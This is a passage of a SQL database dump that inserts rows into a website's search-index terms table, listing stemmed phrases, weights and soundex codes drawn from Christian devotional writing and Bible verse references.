(279369, 'this not', 'thi not', 0, 1, 1.2667, 'T253', 1, '*'),
(279370, 'this not only', 'thi not only', 0, 1, 1.4333, 'T25354', 1, '*'),
(279371, 'this religious', 'thi religious', 0, 1, 1.4667, 'T2642', 1, '*'),
(279372, 'this religious people', 'thi religious people', 0, 1, 1.7, 'T264214', 1, '*'),
(279373, 'this sounds', 'thi sounds', 0, 1, 1.3667, 'T2532', 1, '*'),
(279374, 'this sounds like', 'thi sounds like', 0, 1, 1.5333, 'T253242', 1, '*'),
(279375, 'this sounds thinking', 'thi sounds thinking', 0, 1, 1.6667, 'T253235252', 1, '*'),
(279376, 'this statement', 'thi statement', 0, 1, 1.4667, 'T2353', 1, '*'),
(279377, 'this statement in', 'thi statement in', 0, 1, 1.5667, 'T23535', 1, '*'),
(279378, 'this story', 'thi story', 0, 1, 1.3333, 'T236', 1, '*'),
(279379, 'this story is', 'thi story is', 0, 1, 1.4333, 'T2362', 1, '*'),
(279380, 'those things if', 'those things if', 0, 1, 1.5, 'T23521', 1, '*'),
(279381, 'those things she', 'those things she', 0, 1, 1.5333, 'T2352', 1, '*'),
(279382, 'those who practice', 'those who practice', 0, 1, 1.6, 'T216232', 1, '*'),
(279383, 'thoughts as', 'thought as', 0, 1, 1.3667, 'T232', 1, '*'),
(279384, 'thoughts as seen', 'thought as seen', 0, 1, 1.5333, 'T2325', 1, '*'),
(279385, 'thoughts fortunately', 'thought fortunately', 0, 1, 1.6667, 'T232163534', 1, '*'),
(279386, 'thoughts fortunately for', 'thought fortunately for', 0, 1, 1.8, 'T23216353416', 1, '*'),
(279387, 'thoughts negative', 'thought negative', 0, 1, 1.5667, 'T2325231', 1, '*'),
(279388, 'thoughts negative or', 'thought negative or', 0, 1, 1.6667, 'T23252316', 1, '*'),
(279389, 'three things we', 'three things we', 0, 1, 1.5, 'T6352', 1, '*'),
(279390, 'three-quarter', 'three-quarter', 0, 0, 0.8667, 'T62636', 1, '*'),
(279391, 'three-quarter naked', 'three-quarter naked', 0, 1, 1.6333, 'T62636523', 1, '*'),
(279392, 'three-quarter naked you', 'three-quarter naked you', 0, 1, 1.7667, 'T62636523', 1, '*'),
(279393, 'through faith', 'through faith', 0, 1, 1.4333, 'T6213', 1, '*'),
(279394, 'through faith and', 'through faith and', 0, 1, 1.5667, 'T621353', 1, '*'),
(279395, 'through the way', 'through the way', 0, 1, 1.5, 'T623', 1, '*'),
(279396, 'tight', 'tight', 0, 0, 0.3333, 'T230', 1, '*'),
(279397, 'tight or', 'tight or', 0, 1, 1.2667, 'T236', 1, '*'),
(279398, 'tight or unfavorable', 'tight or unfavorable', 0, 1, 1.6667, 'T23651614', 1, '*'),
(279399, 'time should', 'time should', 0, 1, 1.3667, 'T5243', 1, '*'),
(279400, 'time should reflect', 'time should reflect', 0, 1, 1.6333, 'T524361423', 1, '*'),
(279401, 'times for', 'time for', 0, 1, 1.3, 'T5216', 1, '*'),
(279402, 'times for women', 'time for women', 0, 1, 1.5, 'T52165', 1, '*'),
(279403, 'times iii', 'time iii', 0, 1, 1.3, 'T520', 1, '*'),
(279404, 'times iii you', 'time iii you', 0, 1, 1.4333, 'T520', 1, '*'),
(279405, 'times in the', 'time in the', 0, 1, 1.4, 'T5253', 1, '*'),
(279406, 'to a acting', 'to a acting', 0, 1, 1.3667, 'T2352', 1, '*'),
(279407, 'to act', 'to act', 0, 1, 1.2, 'T230', 1, '*'),
(279408, 'to act like', 'to act like', 0, 1, 1.3667, 'T2342', 1, '*'),
(279409, 'to attend', 'to attend', 0, 1, 1.3, 'T530', 1, '*'),
(279410, 'to attend church', 'to attend church', 0, 1, 1.5333, 'T53262', 1, '*'),
(279411, 'to be found', 'to be found', 0, 1, 1.3667, 'T153', 1, '*'),
(279412, 'to be your', 'to be your', 0, 1, 1.3333, 'T160', 2, '*'),
(279413, 'to become much', 'to become much', 0, 1, 1.4667, 'T1252', 1, '*'),
(279414, 'to behave', 'to behave', 0, 1, 1.3, 'T100', 1, '*'),
(279415, 'to behave in', 'to behave in', 0, 1, 1.4, 'T150', 1, '*'),
(279416, 'to believe', 'to believe', 0, 1, 1.3333, 'T141', 2, '*'),
(279417, 'to believe that', 'to believe that', 0, 1, 1.5, 'T1413', 1, '*'),
(279418, 'to call', 'to call', 0, 1, 1.2333, 'T240', 1, '*'),
(279419, 'to call forth', 'to call forth', 0, 1, 1.4333, 'T24163', 1, '*'),
(279420, 'to complicate', 'to complicate', 0, 1, 1.4333, 'T251423', 1, '*'),
(279421, 'to complicate matters', 'to complicate matters', 0, 1, 1.7, 'T2514235362', 1, '*'),
(279422, 'to create', 'to create', 0, 1, 1.3, 'T263', 1, '*'),
(279423, 'to create people', 'to create people', 0, 1, 1.5333, 'T26314', 1, '*'),
(279424, 'to dealing', 'to dealing', 0, 1, 1.3333, 'T452', 1, '*'),
(279425, 'to dealing with', 'to dealing with', 0, 1, 1.5, 'T4523', 1, '*'),
(279426, 'to die for', 'to die for', 0, 1, 1.3333, 'T160', 1, '*'),
(279427, 'to do even', 'to do even', 0, 1, 1.3333, 'T150', 1, '*'),
(279428, 'to draw closer', 'to draw closer', 0, 1, 1.4667, 'T62426', 1, '*'),
(279429, 'to focus', 'to focus', 0, 1, 1.2667, 'T120', 1, '*'),
(279430, 'to focus on', 'to focus on', 0, 1, 1.3667, 'T125', 1, '*'),
(279431, 'to follow a', 'to follow a', 0, 1, 1.3667, 'T140', 1, '*'),
(279432, 'to glorify', 'to glorify', 0, 1, 1.3333, 'T2461', 1, '*'),
(279433, 'to glorify god', 'to glorify god', 0, 1, 1.4667, 'T246123', 1, '*'),
(279434, 'to god the', 'to god the', 0, 1, 1.3333, 'T230', 1, '*'),
(279435, 'to his name', 'to his name', 0, 1, 1.3667, 'T250', 1, '*'),
(279436, 'to improve', 'to improve', 0, 1, 1.3333, 'T5161', 1, '*'),
(279437, 'to improve the', 'to improve the', 0, 1, 1.4667, 'T51613', 1, '*'),
(279438, 'to jesus in', 'to jesus in', 0, 1, 1.3667, 'T250', 1, '*'),
(279439, 'to jesus that', 'to jesus that', 0, 1, 1.4333, 'T230', 1, '*'),
(279440, 'to keep bothering', 'to keep bothering', 0, 1, 1.5667, 'T213652', 1, '*'),
(279441, 'to keep the', 'to keep the', 0, 1, 1.3667, 'T213', 1, '*'),
(279442, 'to look', 'to look', 0, 1, 1.2333, 'T420', 2, '*'),
(279443, 'to look as', 'to look as', 0, 1, 1.3333, 'T420', 1, '*'),
(279444, 'to look closely', 'to look closely', 0, 1, 1.5, 'T42424', 1, '*'),
(279445, 'to look rough', 'to look rough', 0, 1, 1.4333, 'T4262', 1, '*'),
(279446, 'to lust', 'to lust', 0, 1, 1.2333, 'T423', 1, '*'),
(279447, 'to lust but', 'to lust but', 0, 1, 1.3667, 'T42313', 1, '*'),
(279448, 'to mary', 'to mary', 0, 1, 1.2333, 'T560', 1, '*'),
(279449, 'to mary and', 'to mary and', 0, 1, 1.3667, 'T5653', 1, '*'),
(279450, 'to men', 'to men', 0, 1, 1.2, 'T500', 1, '*'),
(279451, 'to men also', 'to men also', 0, 1, 1.3667, 'T542', 1, '*'),
(279452, 'to overcome', 'to overcome', 0, 1, 1.3667, 'T1625', 2, '*'),
(279453, 'to overcome as', 'to overcome as', 0, 1, 1.4667, 'T16252', 1, '*'),
(279454, 'to please god', 'to please god', 0, 1, 1.4333, 'T1423', 1, '*'),
(279455, 'to say start', 'to say start', 0, 1, 1.4, 'T2363', 1, '*'),
(279456, 'to stand in', 'to stand in', 0, 1, 1.3667, 'T23535', 1, '*'),
(279457, 'to stop you', 'to stop you', 0, 1, 1.3667, 'T231', 1, '*'),
(279458, 'to talk', 'to talk', 0, 1, 1.2333, 'T420', 1, '*'),
(279459, 'to talk like', 'to talk like', 0, 1, 1.4, 'T4242', 1, '*'),
(279460, 'to tell from', 'to tell from', 0, 1, 1.4, 'T4165', 1, '*'),
(279461, 'to the presence', 'to the presence', 0, 1, 1.5, 'T16252', 1, '*'),
(279462, 'to them in', 'to them in', 0, 1, 1.3333, 'T500', 2, '*'),
(279463, 'to think', 'to think', 0, 1, 1.2667, 'T520', 1, '*'),
(279464, 'to think but', 'to think but', 0, 1, 1.4, 'T5213', 1, '*'),
(279465, 'to think highly', 'to think highly', 0, 1, 1.5, 'T524', 1, '*'),
(279466, 'to think it', 'to think it', 0, 1, 1.3667, 'T523', 1, '*'),
(279467, 'to think like', 'to think like', 0, 1, 1.4333, 'T5242', 1, '*'),
(279468, 'to think of', 'to think of', 0, 1, 1.3667, 'T521', 1, '*'),
(279469, 'to think soberly.”', 'to think soberly.”', 0, 1, 1.6, 'T52164', 1, '*'),
(279470, 'to use your', 'to use your', 0, 1, 1.3667, 'T260', 1, '*'),
(279471, 'to women', 'to women', 0, 1, 1.2667, 'T500', 1, '*'),
(279472, 'to women but', 'to women but', 0, 1, 1.4, 'T513', 1, '*'),
(279473, 'to wow', 'to wow', 0, 1, 1.2, 'T000', 1, '*'),
(279474, 'to wow that', 'to wow that', 0, 1, 1.3667, 'T000', 1, '*'),
(279475, 'today are', 'todai are', 0, 1, 1.3, 'T600', 1, '*'),
(279476, 'today are so', 'todai are so', 0, 1, 1.4, 'T620', 1, '*'),
(279477, 'told us many', 'told us many', 0, 1, 1.4, 'T4325', 1, '*'),
(279478, 'tongues your', 'tongu your', 0, 1, 1.4, 'T526', 1, '*'),
(279479, 'tongues your lingo', 'tongu your lingo', 0, 1, 1.6, 'T526452', 1, '*'),
(279480, 'too far', 'too far', 0, 1, 1.2333, 'T160', 1, '*'),
(279481, 'too far let', 'too far let', 0, 1, 1.3667, 'T1643', 1, '*'),
(279482, 'took the role', 'took the role', 0, 1, 1.4333, 'T2364', 1, '*'),
(279483, 'tool for change', 'tool for change', 0, 1, 1.5, 'T416252', 1, '*'),
(279484, 'toughest', 'toughest', 0, 0, 0.5333, 'T230', 1, '*'),
(279485, 'toughest of', 'toughest of', 0, 1, 1.3667, 'T231', 1, '*'),
(279486, 'toughest of the', 'toughest of the', 0, 1, 1.5, 'T2313', 1, '*'),
(279487, 'treat others', 'treat others', 0, 1, 1.4, 'T6362', 1, '*'),
(279488, 'treat others with', 'treat others with', 0, 1, 1.5667, 'T63623', 1, '*'),
(279489, 'true christian this', 'true christian this', 0, 1, 1.6333, 'T62623532', 1, '*'),
(279490, 'trying', 'try', 0, 0, 0.4, 'T652', 2, '*'),
(279491, 'trying to', 'try to', 0, 1, 1.3, 'T6523', 2, '*'),
(279492, 'trying to look', 'try to look', 0, 1, 1.4667, 'T652342', 1, '*'),
(279493, 'two very different', 'two very different', 0, 1, 1.6, 'T1631653', 1, '*'),
(279494, 'unbroken occultic', 'unbroken occultic', 0, 1, 1.5667, 'U516252432', 1, '*'),
(279495, 'unbroken occultic covenants', 'unbroken occultic covenants', 0, 1, 1.9, 'U5162524321532', 1, '*'),
(279496, 'unfavorable', 'unfavor', 0, 0, 0.7333, 'U51614', 1, '*'),
(279497, 'unfavorable situation', 'unfavor situation', 0, 1, 1.7, 'U51614235', 1, '*'),
(279498, 'unfavorable situation instead', 'unfavor situation instead', 0, 1, 1.9667, 'U5161423523', 1, '*'),
(279499, 'unhappy', 'unhappi', 0, 0, 0.4667, 'U510', 1, '*'),
(279500, 'unhappy because', 'unhappi because', 0, 1, 1.5, 'U512', 1, '*'),
(279501, 'unhappy because god', 'unhappi because god', 0, 1, 1.6333, 'U5123', 1, '*'),
(279502, 'unkempt', 'unkempt', 0, 0, 0.4667, 'U52513', 1, '*'),
(279503, 'unkempt and', 'unkempt and', 0, 1, 1.3667, 'U5251353', 1, '*'),
(279504, 'unkempt and wretched', 'unkempt and wretched', 0, 1, 1.6667, 'U52513536323', 1, '*'),
(279505, 'unless', 'unless', 0, 0, 0.4, 'U542', 1, '*'),
(279506, 'unless they', 'unless they', 0, 1, 1.3667, 'U5423', 1, '*'),
(279507, 'unless they tell', 'unless they tell', 0, 1, 1.5333, 'U54234', 1, '*'),
(279508, 'us many', 'us many', 0, 1, 1.2333, 'U250', 1, '*'),
(279509, 'us many times', 'us many times', 0, 1, 1.4333, 'U25352', 1, '*'),
(279510, 'us special', 'us special', 0, 1, 1.3333, 'U2124', 1, '*'),
(279511, 'us special and', 'us special and', 0, 1, 1.4667, 'U212453', 1, '*'),
(279512, 'us take', 'us take', 0, 1, 1.2333, 'U232', 1, '*'),
(279513, 'us take a', 'us take a', 0, 1, 1.3, 'U232', 1, '*'),
(279514, 'us that privilege', 'us that privilege', 0, 1, 1.5667, 'U2316142', 1, '*'),
(279515, 'us there', 'us there', 0, 1, 1.2667, 'U236', 1, '*'),
(279516, 'us there is', 'us there is', 0, 1, 1.3667, 'U2362', 1, '*'),
(279517, 'use c', 'us c', 0, 1, 1.1667, 'U200', 1, '*'),
(279518, 'use c think', 'us c think', 0, 1, 1.3667, 'U2352', 1, '*'),
(279519, 'use foul', 'us foul', 0, 1, 1.2667, 'U214', 1, '*'),
(279520, 'use foul slangs', 'us foul slangs', 0, 1, 1.5, 'U2142452', 1, '*'),
(279521, 'use your words', 'us your words', 0, 1, 1.4667, 'U2632', 1, '*'),
(279522, 'vain', 'vain', 0, 0, 0.2667, 'V500', 1, '*'),
(279523, 'vain another', 'vain another', 0, 1, 1.4, 'V536', 1, '*'),
(279524, 'vain another classic', 'vain another classic', 0, 1, 1.6667, 'V536242', 1, '*'),
(279525, 'very different', 'veri different', 0, 1, 1.4667, 'V631653', 1, '*'),
(279526, 'very different attitudes', 'veri different attitudes', 0, 1, 1.8, 'V6316532', 1, '*'),
(279527, 'very powerful point', 'veri powerful point', 0, 1, 1.6333, 'V61614153', 1, '*'),
(279528, 'wordsthat', 'wordsthat', 0, 0, 0.6, 'W6323', 1, '*'),
(279529, 'wordsthat worldly', 'wordsthat worldly', 0, 1, 1.5667, 'W63236434', 1, '*'),
(279530, 'wordsthat worldly people', 'wordsthat worldly people', 0, 1, 1.8, 'W6323643414', 1, '*'),
(279531, 'you act', 'you act', 0, 1, 1.2333, 'Y230', 1, '*'),
(279532, 'you act all', 'you act all', 0, 1, 1.3667, 'Y234', 1, '*'),
(279533, 'you are expected', 'you are expected', 0, 1, 1.5333, 'Y62123', 1, '*'),
(279534, 'you are from', 'you are from', 0, 1, 1.4, 'Y6165', 1, '*'),
(279535, 'you aren\'t', 'you aren', 0, 1, 1.3333, 'Y653', 1, '*'),
(279536, 'you aren\'t expected', 'you aren expected', 0, 1, 1.6333, 'Y6532123', 1, '*'),
(279537, 'you can\'t appear', 'you can appear', 0, 1, 1.5333, 'Y25316', 1, '*'),
(279538, 'you can\'t ever', 'you can ever', 0, 1, 1.4667, 'Y25316', 1, '*'),
(279539, 'you carry yourself', 'you carry yourself', 0, 1, 1.6, 'Y26241', 1, '*'),
(279540, 'you consult', 'you consult', 0, 1, 1.3667, 'Y25243', 1, '*'),
(279541, 'you consult some', 'you consult some', 0, 1, 1.5333, 'Y2524325', 1, '*'),
(279542, 'you differentiate', 'you differentiate', 0, 1, 1.5667, 'Y31653', 1, '*'),
(279543, 'you differentiate yourself', 'you differentiate yourself', 0, 1, 1.8667, 'Y316536241', 1, '*'),
(279544, 'you directly', 'you directly', 0, 1, 1.4, 'Y36234', 1, '*'),
(279545, 'you directly that', 'you directly that', 0, 1, 1.5667, 'Y362343', 1, '*'),
(279546, 'you don\'t mistakenly', 'you don mistakenly', 0, 1, 1.6667, 'Y353523254', 1, '*'),
(279547, 'you from thinking', 'you from thinking', 0, 1, 1.5667, 'Y16535252', 1, '*'),
(279548, 'you had', 'you had', 0, 1, 1.2333, 'Y300', 1, '*'),
(279549, 'you had a', 'you had a', 0, 1, 1.3, 'Y300', 1, '*'),
(279550, 'you have anything', 'you have anything', 0, 1, 1.5667, 'Y15352', 1, '*'),
(279551, 'you have nothing', 'you have nothing', 0, 1, 1.5333, 'Y15352', 1, '*'),
(279552, 'you know will', 'you know will', 0, 1, 1.4333, 'Y254', 2, '*'),
(279553, 'you live', 'you live', 0, 1, 1.2667, 'Y410', 1, '*'),
(279554, 'you live your', 'you live your', 0, 1, 1.4333, 'Y416', 1, '*'),
(279555, 'you must also', 'you must also', 0, 1, 1.4333, 'Y52342', 1, '*'),
(279556, 'you must always', 'you must always', 0, 1, 1.5, 'Y52342', 2, '*'),
(279557, 'you must reflect', 'you must reflect', 0, 1, 1.5333, 'Y52361423', 1, '*'),
(279558, 'you must relate', 'you must relate', 0, 1, 1.5, 'Y523643', 1, '*'),
(279559, 'you must renounce', 'you must renounce', 0, 1, 1.5667, 'Y523652', 1, '*'),
(279560, 'you mustn\'t', 'you mustn', 0, 1, 1.3667, 'Y52353', 1, '*'),
(279561, 'you mustn\'t carry', 'you mustn carry', 0, 1, 1.5667, 'Y5235326', 1, '*'),
(279562, 'you of the', 'you of the', 0, 1, 1.3333, 'Y130', 1, '*'),
(279563, 'you ought', 'you ought', 0, 1, 1.3, 'Y230', 1, '*'),
(279564, 'you ought to', 'you ought to', 0, 1, 1.4, 'Y230', 1, '*'),
(279565, 'you probably', 'you probably', 0, 1, 1.4, 'Y1614', 1, '*'),
(279566, 'you probably didn\'t', 'you probably didn', 0, 1, 1.6333, 'Y1614353', 1, '*'),
(279567, 'you probably never', 'you probably never', 0, 1, 1.6, 'Y1614516', 1, '*'),
(279568, 'you say', 'you say', 0, 1, 1.2333, 'Y200', 2, '*'),
(279569, 'you say eat', 'you say eat', 0, 1, 1.3667, 'Y230', 1, '*'),
(279570, 'you say will', 'you say will', 0, 1, 1.4, 'Y240', 1, '*'),
(279571, 'you should use', 'you should use', 0, 1, 1.4667, 'Y2432', 1, '*'),
(279572, 'you shouldn\'t', 'you shouldn', 0, 1, 1.4333, 'Y24353', 1, '*'),
(279573, 'you shouldn\'t be', 'you shouldn be', 0, 1, 1.5333, 'Y243531', 1, '*'),
(279574, 'you special', 'you special', 0, 1, 1.3667, 'Y2124', 1, '*'),
(279575, 'you special be', 'you special be', 0, 1, 1.4667, 'Y21241', 1, '*'),
(279576, 'you start thinking', 'you start thinking', 0, 1, 1.6, 'Y23635252', 1, '*'),
(279577, 'you still', 'you still', 0, 1, 1.3, 'Y234', 1, '*'),
(279578, 'you still have', 'you still have', 0, 1, 1.4667, 'Y2341', 1, '*'),
(279579, 'you such', 'you such', 0, 1, 1.2667, 'Y200', 1, '*'),
(279580, 'you such as', 'you such as', 0, 1, 1.3667, 'Y200', 1, '*'),
(279581, 'you to look', 'you to look', 0, 1, 1.3667, 'Y342', 1, '*'),
(279582, 'you to think', 'you to think', 0, 1, 1.4, 'Y352', 1, '*'),
(279583, 'you wear', 'you wear', 0, 1, 1.2667, 'Y600', 1, '*'),
(279584, 'you wear must', 'you wear must', 0, 1, 1.4333, 'Y6523', 1, '*'),
(279585, 'you won\'t', 'you won', 0, 1, 1.3, 'Y530', 2, '*'),
(279586, 'you won\'t be', 'you won be', 0, 1, 1.4, 'Y531', 1, '*'),
(279587, 'you\'ll have', 'you have', 0, 1, 1.3667, 'Y410', 1, '*'),
(279588, 'you\'ll have to', 'you have to', 0, 1, 1.4667, 'Y413', 1, '*'),
(279589, 'you\'re dressed', 'you dressed', 0, 1, 1.4667, 'Y63623', 1, '*'),
(279590, 'you\'re dressed at', 'you dressed at', 0, 1, 1.5667, 'Y63623', 1, '*'),
(279591, 'you\'re ever', 'you ever', 0, 1, 1.3667, 'Y616', 1, '*'),
(279592, 'you\'re ever in', 'you ever in', 0, 1, 1.4667, 'Y6165', 1, '*'),
(279593, 'you\'re expected', 'you expected', 0, 1, 1.5, 'Y62123', 1, '*'),
(279594, 'you\'re expected to', 'you expected to', 0, 1, 1.6, 'Y62123', 1, '*'),
(279595, 'your authority', 'your authority', 0, 1, 1.4667, 'Y6363', 1, '*'),
(279596, 'your authority as', 'your authority as', 0, 1, 1.5667, 'Y63632', 1, '*'),
(279597, 'your best appearance', 'your best appearance', 0, 1, 1.6667, 'Y61231652', 1, '*'),
(279598, 'your christianity', 'your christianity', 0, 1, 1.5667, 'Y6262353', 1, '*'),
(279599, 'your christianity to', 'your christianity to', 0, 1, 1.6667, 'Y6262353', 1, '*'),
(279600, 'your dressing', 'your dressing', 0, 1, 1.4333, 'Y636252', 1, '*'),
(279601, 'your dressing must', 'your dressing must', 0, 1, 1.6, 'Y636252523', 1, '*'),
(279602, 'your life avoid', 'your life avoid', 0, 1, 1.5, 'Y6413', 1, '*'),
(279603, 'your life so', 'your life so', 0, 1, 1.4, 'Y6412', 1, '*'),
(279604, 'your life therefore', 'your life therefore', 0, 1, 1.6333, 'Y6413616', 1, '*'),
(279605, 'your lifestyle', 'your lifestyle', 0, 1, 1.4667, 'Y641234', 1, '*'),
(279606, 'your lifestyle as', 'your lifestyle as', 0, 1, 1.5667, 'Y6412342', 1, '*'),
(279607, 'your lifestyle what', 'your lifestyle what', 0, 1, 1.6333, 'Y6412343', 1, '*'),
(279608, 'your lingo', 'your lingo', 0, 1, 1.3333, 'Y6452', 1, '*'),
(279609, 'your lingo must', 'your lingo must', 0, 1, 1.5, 'Y6452523', 1, '*'),
(279610, 'your mind or', 'your mind or', 0, 1, 1.4, 'Y6536', 1, '*'),
(279611, 'your peers', 'your peers', 0, 1, 1.3333, 'Y6162', 1, '*'),
(279612, 'your peers and', 'your peers and', 0, 1, 1.4667, 'Y616253', 1, '*'),
(279613, 'your physical', 'your physical', 0, 1, 1.4333, 'Y6124', 1, '*'),
(279614, 'your physical life', 'your physical life', 0, 1, 1.6, 'Y61241', 1, '*'),
(279615, 'your possession', 'your possession', 0, 1, 1.5, 'Y6125', 2, '*'),
(279616, 'your possession everything', 'your possession everything', 0, 1, 1.8667, 'Y612516352', 1, '*'),
(279617, 'your primary focus', 'your primary focus', 0, 1, 1.6, 'Y6165612', 1, '*'),
(279618, 'your speech', 'your speech', 0, 1, 1.3667, 'Y6212', 1, '*'),
(279619, 'your speech must', 'your speech must', 0, 1, 1.5333, 'Y6212523', 1, '*'),
(279620, 'your thoughts', 'your thoughts', 0, 1, 1.4333, 'Y63232', 1, '*'),
(279621, 'your thoughts as', 'your thoughts as', 0, 1, 1.5333, 'Y63232', 1, '*'),
(279622, 'your words as', 'your words as', 0, 1, 1.4333, 'Y632', 1, '*'),
(279623, 'your words closely', 'your words closely', 0, 1, 1.6, 'Y632424', 1, '*'),
(279624, 'your words determine', 'your words determine', 0, 1, 1.6667, 'Y632365', 1, '*'),
(279625, 'your words to', 'your words to', 0, 1, 1.4333, 'Y6323', 1, '*'),
(279626, 'yourself from the', 'yourself from the', 0, 1, 1.5667, 'Y6241653', 1, '*'),
(279627, 'yourself in a', 'yourself in a', 0, 1, 1.4333, 'Y62415', 1, '*'),
(279628, 'yourself now', 'yourself now', 0, 1, 1.4, 'Y62415', 1, '*'),
(279629, 'yourself now behaving', 'yourself now behaving', 0, 1, 1.7, 'Y62415152', 1, '*'),
(279630, 'yourself with any', 'yourself with any', 0, 1, 1.5667, 'Y624135', 1, '*'),
(279631, 'yourself with respect', 'yourself with respect', 0, 1, 1.7, 'Y6241362123', 1, '*'),
(279632, 'yourself.”', 'yourself.”', 0, 0, 0.6667, 'Y6241', 1, '*'),
(279633, 'yourself.” it', 'yourself.” it', 0, 1, 1.4333, 'Y62413', 1, '*'),
(279634, 'yourself.” it says', 'yourself.” it says', 0, 1, 1.6, 'Y624132', 1, '*'),
(279635, '“don\'t', '“don', 0, 0, 0.4, '“353', 1, '*'),
(279636, '“don\'t think', '“don think', 0, 1, 1.4, '“35352', 1, '*'),
(279637, '“don\'t think highly', '“don think highly', 0, 1, 1.6333, '“353524', 1, '*'),
(279638, '“not', '“not', 0, 0, 0.2667, '“530', 1, '*'),
(279639, '“not to', '“not to', 0, 1, 1.2333, '“530', 1, '*'),
(279640, '“not to think', '“not to think', 0, 1, 1.4333, '“5352', 1, '*'),
(281666, '1 poor', '1 poor', 0, 1, 1.2, 'P600', 1, '*'),
(281667, '1 poor matthew6', '1 poor matthew6', 0, 1, 1.5, 'P653', 1, '*'),
(281668, '10-12 the', '10-12 the', 0, 1, 1.3, 'T000', 1, '*'),
(281669, '10-12 the christians', '10-12 the christians', 0, 1, 1.6667, 'T262352', 1, '*'),
(281670, '13 15-16', '13 15-16', 0, 1, 1.2667, '', 1, '*'),
(281671, '13 15-16 this', '13 15-16 this', 0, 1, 1.4333, 'T200', 1, '*'),
(281672, '14-22', '14-22', 0, 0, 0.5, '', 1, '*'),
(281673, '14-22 the', '14-22 the', 0, 1, 1.3, 'T000', 1, '*'),
(281674, '14-22 the church', '14-22 the church', 0, 1, 1.5333, 'T262', 1, '*'),
(281675, '15-16 this', '15-16 this', 0, 1, 1.3333, 'T200', 1, '*'),
(281676, '15-16 this is', '15-16 this is', 0, 1, 1.4333, 'T200', 1, '*'),
(281677, '15-22', '15-22', 0, 0, 0.5, '', 1, '*'),
(281678, '15-22 in', '15-22 in', 0, 1, 1.2667, 'I500', 1, '*'),
(281679, '15-22 in these', '15-22 in these', 0, 1, 1.4667, 'I532', 1, '*'),
(281680, '16-17', '16-17', 0, 0, 0.5, '', 1, '*'),
(281681, '16-17 3', '16-17 3', 0, 1, 1.2333, '', 1, '*'),
(281682, '16-17 3 7-11', '16-17 3 7-11', 0, 1, 1.4, '', 1, '*'),
(281683, '17-18 1', '17-18 1', 0, 1, 1.2333, '', 1, '*'),
(281684, '17-18 1 poor', '17-18 1 poor', 0, 1, 1.4, 'P600', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(281685, '19-20 your', '19-20 your', 0, 1, 1.3333, 'Y600', 1, '*'),
(281686, '19-20 your true', '19-20 your true', 0, 1, 1.5, 'Y636', 1, '*'),
(281687, '2 16-17', '2 16-17', 0, 1, 1.2333, '', 1, '*'),
(281688, '2 16-17 3', '2 16-17 3', 0, 1, 1.3, '', 1, '*'),
(281689, '2 43-44', '2 43-44', 0, 1, 1.2333, '', 1, '*'),
(281690, '2 43-44 the', '2 43-44 the', 0, 1, 1.3667, 'T000', 1, '*'),
(281691, '2 blind', '2 blind', 0, 1, 1.2333, 'B453', 1, '*'),
(281692, '2 blind isaiah', '2 blind isaiah', 0, 1, 1.4667, 'B4532', 1, '*'),
(281693, '24 3,4', '24 3,4', 0, 1, 1.2, '', 1, '*'),
(281694, '24 3,4 10-12', '24 3,4 10-12', 0, 1, 1.4, '', 1, '*'),
(281695, '24 vs', '24 vs', 0, 1, 1.1667, 'V200', 1, '*'),
(281696, '24 vs 15-22', '24 vs 15-22', 0, 1, 1.3667, 'V200', 1, '*'),
(281697, '25 the', '25 the', 0, 1, 1.2, 'T000', 1, '*'),
(281698, '25 the position', '25 the position', 0, 1, 1.5, 'T1235', 1, '*'),
(281699, '3 14-22', '3 14-22', 0, 1, 1.2333, '', 1, '*'),
(281700, '3 14-22 the', '3 14-22 the', 0, 1, 1.3667, 'T000', 1, '*'),
(281701, '3 17-18 1', '3 17-18 1', 0, 1, 1.3, '', 1, '*'),
(281702, '3 7-11', '3 7-11', 0, 1, 1.2, '', 1, '*'),
(281703, '3 7-11 this', '3 7-11 this', 0, 1, 1.3667, 'T200', 1, '*'),
(281704, '3 7-22', '3 7-22', 0, 1, 1.2, '', 1, '*'),
(281705, '3 7-22 mark', '3 7-22 mark', 0, 1, 1.3667, 'M620', 1, '*'),
(281706, '3 naked', '3 naked', 0, 1, 1.2333, 'N230', 1, '*'),
(281707, '3 naked gen', '3 naked gen', 0, 1, 1.3667, 'N2325', 1, '*'),
(281708, '3 v.12', '3 v.12', 0, 1, 1.2, 'V000', 1, '*'),
(281709, '3 v.12 this', '3 v.12 this', 0, 1, 1.3667, 'V320', 1, '*'),
(281710, '3,4', '3,4', 0, 0, 0.3, '', 1, '*'),
(281711, '3,4 10-12', '3,4 10-12', 0, 1, 1.3, '', 1, '*'),
(281712, '3,4 10-12 the', '3,4 10-12 the', 0, 1, 1.4333, 'T000', 1, '*'),
(281713, '4 how', '4 how', 0, 1, 1.1667, 'H000', 1, '*'),
(281714, '4 how do', '4 how do', 0, 1, 1.2667, 'H300', 1, '*'),
(281715, '4 v.1', '4 v.1', 0, 1, 1.1667, 'V000', 1, '*'),
(281716, '4 v.1 there', '4 v.1 there', 0, 1, 1.3667, 'V360', 1, '*'),
(281717, '43 8', '43 8', 0, 1, 1.1333, '', 1, '*'),
(281718, '43 8 matthew', '43 8 matthew', 0, 1, 1.4, 'M300', 1, '*'),
(281719, '43-44', '43-44', 0, 0, 0.5, '', 1, '*'),
(281720, '43-44 the', '43-44 the', 0, 1, 1.3, 'T000', 1, '*'),
(281721, '43-44 the description', '43-44 the description', 0, 1, 1.7, 'T26135', 1, '*'),
(281722, '5 v.19-20', '5 v.19-20', 0, 1, 1.3, 'V000', 1, '*'),
(281723, '5 v.19-20 and', '5 v.19-20 and', 0, 1, 1.4333, 'V530', 1, '*'),
(281724, '7-11', '7-11', 0, 0, 0.4, '', 1, '*'),
(281725, '7-11 this', '7-11 this', 0, 1, 1.3, 'T200', 1, '*'),
(281726, '7-11 this is', '7-11 this is', 0, 1, 1.4, 'T200', 1, '*'),
(281727, '7-22', '7-22', 0, 0, 0.4, '', 1, '*'),
(281728, '7-22 mark', '7-22 mark', 0, 1, 1.3, 'M620', 1, '*'),
(281729, '7-22 mark 24', '7-22 mark 24', 0, 1, 1.4, 'M620', 1, '*'),
(281730, '8 matthew', '8 matthew', 0, 1, 1.3, 'M300', 1, '*'),
(281731, '8 matthew 13', '8 matthew 13', 0, 1, 1.4, 'M300', 1, '*'),
(281732, '9 4 how', '9 4 how', 0, 1, 1.2333, 'H000', 1, '*'),
(281733, 'a backslidden', 'a backslidden', 0, 1, 1.4333, 'A12435', 1, '*'),
